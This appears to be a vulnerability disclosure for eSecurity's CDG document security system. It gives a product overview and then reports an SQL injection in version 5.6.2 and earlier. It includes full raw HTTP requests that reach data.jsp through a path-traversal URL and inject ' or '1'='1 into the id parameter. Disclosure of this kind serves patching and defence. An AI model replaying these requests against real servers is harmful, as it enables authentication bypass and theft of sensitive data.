The new generation electronic document security management system by eSecurity (abbreviated as: CDG) is a comprehensive data intelligent security product that integrates core technologies such as document encryption, data classification and grading, access control, association analysis, big data analysis, and intelligent recognition. The product includes ten core components: transparent encryption, intelligent encryption, permission documents, data classification and grading, terminal security management, file outbound management, group control, data security gateway, encryption and decryption interface middleware, and USB client. The scope of protection covers terminal computers (Windows, Mac, and Linux system platforms), smart terminals (Android, iOS), and various application systems (OA, knowledge management, document management, project management, PDM, etc.). It can provide full lifecycle protection for enterprise core data assets from production, storage, circulation, and outbound transmission to destruction. By uniformly protecting against both “intentional” and “unintentional” data leakage behaviors, and adopting the design concept of “proactive defense before the event, real-time control during the event, and timely tracking after the event to comprehensively prevent leakage,” combined with capabilities such as identity authentication, data classification, level marking, permission control, application integration, secure access, risk warning, and behavior auditing, it ensures comprehensive protection of user terminal data security.
Here is an SQL injection vulnerability in CDG version 5.6.2&before.
This vulnerability allows attackers to manipulate the application’s database through specially crafted SQL query strings. Due to insufficient verification of user input, attackers can insert malicious SQL code into input fields, thereby bypassing authentication, accessing or modifying sensitive data in the database, and even performing database management operations
<https://example.com/CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123>
SQL injection exists for the id
parameter of the data.jsp
page
GET /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123 HTTP/1.1
Host: x.x.x.x:8443
Cookie: JSESSIONID=C373554BF32B5C096CCA66983B818BB2
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
GET /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../ztree/data.jsp&id=123'+or+'1'='1 HTTP/1.1
Host: x.x.x.x:8443
Cookie: JSESSIONID=C373554BF32B5C096CCA66983B818BB2
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close